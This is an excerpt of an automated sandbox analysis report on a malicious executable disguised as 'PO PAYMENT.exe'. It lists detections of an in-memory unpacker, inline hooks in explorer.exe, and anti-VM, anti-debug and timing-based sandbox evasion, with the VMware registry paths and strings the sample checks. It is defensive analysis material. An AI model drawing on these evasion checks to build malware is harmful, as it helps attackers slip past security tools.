          Source: Binary string: explorer.pdb source: PO PAYMENT.exe, 00000001.00000002.388889089.0000000003030000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.369335175.000000000DC20000.00000002.00000001.sdmp

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: PO PAYMENT.exe, FormLogin.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.PO PAYMENT.exe.a40000.0.unpack, FormLogin.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.PO PAYMENT.exe.a40000.0.unpack, FormLogin.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.0.PO PAYMENT.exe.960000.0.unpack, FormLogin.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.2.PO PAYMENT.exe.960000.1.unpack, FormLogin.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 0_2_04EC214A push 7CFFFFFEh; ret 0_2_04EC214F
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_004170B5 push cs; ret 1_2_004170B8
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0040E24A push eax; iretd 1_2_0040E262
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0040E250 push eax; iretd 1_2_0040E262
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0040E28C push 54A1A97Fh; retf 1_2_0040E292
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0040C49D push ss; retf 1_2_0040C49F
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_00417D20 push cs; ret 1_2_00417D29
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0041CEB5 push eax; ret 1_2_0041CF08
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0041CF6C push eax; ret 1_2_0041CF72
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0041CF02 push eax; ret 1_2_0041CF08
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0041CF0B push eax; ret 1_2_0041CF72
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0159D0D1 push ecx; ret 1_2_0159D0E4
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0539D0D1 push ecx; ret 5_2_0539D0E4
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00DED8F2 pushad ; retf 5_2_00DED8F3
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00DE70B5 push cs; ret 5_2_00DE70B8
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00DDE28C push 54A1A97Fh; retf 5_2_00DDE292
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00DDE250 push eax; iretd 5_2_00DDE262
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00DDE24A push eax; iretd 5_2_00DDE262
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00DDC49D push ss; retf 5_2_00DDC49F
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00DE7D20 push cs; ret 5_2_00DE7D29
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00DECEB5 push eax; ret 5_2_00DECF08
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00DECF6C push eax; ret 5_2_00DECF72
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00DECF0B push eax; ret 5_2_00DECF72
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00DECF02 push eax; ret 5_2_00DECF08

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x83 0x3E 0xE6
          Source: C:\Users\user\Desktop\PO PAYMENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO PAYMENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO PAYMENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO PAYMENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO PAYMENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO PAYMENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO PAYMENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO PAYMENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO PAYMENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO PAYMENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO PAYMENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO PAYMENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO PAYMENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO PAYMENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO PAYMENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO PAYMENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO PAYMENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO PAYMENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO PAYMENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO PAYMENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO PAYMENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO PAYMENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO PAYMENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO PAYMENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO PAYMENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO PAYMENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO PAYMENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO PAYMENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO PAYMENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO PAYMENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO PAYMENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM_3Show sources
          Source: Yara matchFile source: Process Memory Space: PO PAYMENT.exe PID: 4704, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: PO PAYMENT.exe, 00000000.00000002.349094746.0000000002ED7000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: PO PAYMENT.exe, 00000000.00000002.349094746.0000000002ED7000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\PO PAYMENT.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PO PAYMENT.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\explorer.exeRDTSC instruction interceptor: First address: 0000000000DD98E4 second address: 0000000000DD98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\explorer.exeRDTSC instruction interceptor: First address: 0000000000DD9B5E second address: 0000000000DD9B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_00409A90 rdtsc 1_2_00409A90
          Source: C:\Users\user\Desktop\PO PAYMENT.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\PO PAYMENT.exe TID: 4792Thread sleep time: -41500s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\PO PAYMENT.exe TID: 4668Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 7080Thread sleep count: 36 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 7080Thread sleep time: -72000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exe TID: 5760Thread sleep time: -70000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: explorer.exe, 00000002.00000000.365746556.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000002.00000000.365716590.00000000083E9000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000002.00000000.361454889.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000002.00000000.362008137.00000000063F6000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: PO PAYMENT.exe, 00000000.00000002.349094746.0000000002ED7000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000002.00000000.365716590.00000000083E9000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000002.00000000.365633163.00000000082E2000.00000004.00000001.sdmpBinary or memory string: 1efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA+
          Source: PO PAYMENT.exe, 00000000.00000002.349094746.0000000002ED7000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: PO PAYMENT.exe, 00000000.00000002.349094746.0000000002ED7000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000002.00000000.362008137.00000000063F6000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: PO PAYMENT.exe, 00000000.00000002.349094746.0000000002ED7000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: explorer.exe, 00000002.00000000.365633163.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: PO PAYMENT.exe, 00000000.00000002.349094746.0000000002ED7000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000002.00000000.361454889.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000002.00000000.361454889.0000000005D50000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: PO PAYMENT.exe, 00000000.00000002.349094746.0000000002ED7000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: PO PAYMENT.exe, 00000000.00000002.349094746.0000000002ED7000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: PO PAYMENT.exe, 00000000.00000002.349094746.0000000002ED7000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 00000002.00000000.365633163.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000002.00000000.365746556.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: explorer.exe, 00000002.00000000.352476611.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: explorer.exe, 00000002.00000000.361454889.0000000005D50000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\PO PAYMENT.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\PO PAYMENT.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\PO PAYMENT.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\PO PAYMENT.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\PO PAYMENT.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\PO PAYMENT.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_00409A90 rdtsc 1_2_00409A90
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0040ACD0 LdrLoadDll,1_2_0040ACD0
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0156B944 mov eax, dword ptr fs:[00000030h]1_2_0156B944
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0156B944 mov eax, dword ptr fs:[00000030h]1_2_0156B944
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0154B171 mov eax, dword ptr fs:[00000030h]1_2_0154B171
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0154B171 mov eax, dword ptr fs:[00000030h]1_2_0154B171
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0154C962 mov eax, dword ptr fs:[00000030h]1_2_0154C962
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_01549100 mov eax, dword ptr fs:[00000030h]1_2_01549100
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_01549100 mov eax, dword ptr fs:[00000030h]1_2_01549100
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_01549100 mov eax, dword ptr fs:[00000030h]1_2_01549100
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0157513A mov eax, dword ptr fs:[00000030h]1_2_0157513A
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0157513A mov eax, dword ptr fs:[00000030h]1_2_0157513A
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_01564120 mov eax, dword ptr fs:[00000030h]1_2_01564120
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_01564120 mov eax, dword ptr fs:[00000030h]1_2_01564120
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_01564120 mov eax, dword ptr fs:[00000030h]1_2_01564120
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_01564120 mov eax, dword ptr fs:[00000030h]1_2_01564120
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_01564120 mov ecx, dword ptr fs:[00000030h]1_2_01564120
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_015D41E8 mov eax, dword ptr fs:[00000030h]1_2_015D41E8
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0154B1E1 mov eax, dword ptr fs:[00000030h]1_2_0154B1E1
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0154B1E1 mov eax, dword ptr fs:[00000030h]1_2_0154B1E1
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0154B1E1 mov eax, dword ptr fs:[00000030h]1_2_0154B1E1
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_016049A4 mov eax, dword ptr fs:[00000030h]1_2_016049A4
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_016049A4 mov eax, dword ptr fs:[00000030h]1_2_016049A4
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_016049A4 mov eax, dword ptr fs:[00000030h]1_2_016049A4
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_016049A4 mov eax, dword ptr fs:[00000030h]1_2_016049A4
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_01572990 mov eax, dword ptr fs:[00000030h]1_2_01572990
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_01574190 mov eax, dword ptr fs:[00000030h]1_2_01574190
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0157A185 mov eax, dword ptr fs:[00000030h]1_2_0157A185
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0156C182 mov eax, dword ptr fs:[00000030h]1_2_0156C182
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_015C51BE mov eax, dword ptr fs:[00000030h]1_2_015C51BE
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_015C51BE mov eax, dword ptr fs:[00000030h]1_2_015C51BE
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_015C51BE mov eax, dword ptr fs:[00000030h]1_2_015C51BE
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_015C51BE mov eax, dword ptr fs:[00000030h]1_2_015C51BE
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_015699BF mov ecx, dword ptr fs:[00000030h]1_2_015699BF
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_015699BF mov ecx, dword ptr fs:[00000030h]1_2_015699BF
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_015699BF mov eax, dword ptr fs:[00000030h]1_2_015699BF
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_015699BF mov ecx, dword ptr fs:[00000030h]1_2_015699BF
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_015699BF mov ecx, dword ptr fs:[00000030h]1_2_015699BF
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_015699BF mov eax, dword ptr fs:[00000030h]1_2_015699BF
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_015699BF mov ecx, dword ptr fs:[00000030h]1_2_015699BF
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_015699BF mov ecx, dword ptr fs:[00000030h]1_2_015699BF
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_015699BF mov eax, dword ptr fs:[00000030h]1_2_015699BF
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_015699BF mov ecx, dword ptr fs:[00000030h]1_2_015699BF
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_015699BF mov ecx, dword ptr fs:[00000030h]1_2_015699BF
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_015699BF mov eax, dword ptr fs:[00000030h]1_2_015699BF
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_015761A0 mov eax, dword ptr fs:[00000030h]1_2_015761A0
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_015761A0 mov eax, dword ptr fs:[00000030h]1_2_015761A0
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_015C69A6 mov eax, dword ptr fs:[00000030h]1_2_015C69A6
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_01560050 mov eax, dword ptr fs:[00000030h]1_2_01560050
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_01560050 mov eax, dword ptr fs:[00000030h]1_2_01560050
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_01602073 mov eax, dword ptr fs:[00000030h]1_2_01602073
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_01611074 mov eax, dword ptr fs:[00000030h]1_2_01611074
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_015C7016 mov eax, dword ptr fs:[00000030h]1_2_015C7016
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_015C7016 mov eax, dword ptr fs:[00000030h]1_2_015C7016
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_015C7016 mov eax, dword ptr fs:[00000030h]1_2_015C7016
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0156A830 mov eax, dword ptr fs:[00000030h]1_2_0156A830
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0156A830 mov eax, dword ptr fs:[00000030h]1_2_0156A830
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0156A830 mov eax, dword ptr fs:[00000030h]1_2_0156A830
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0156A830 mov eax, dword ptr fs:[0000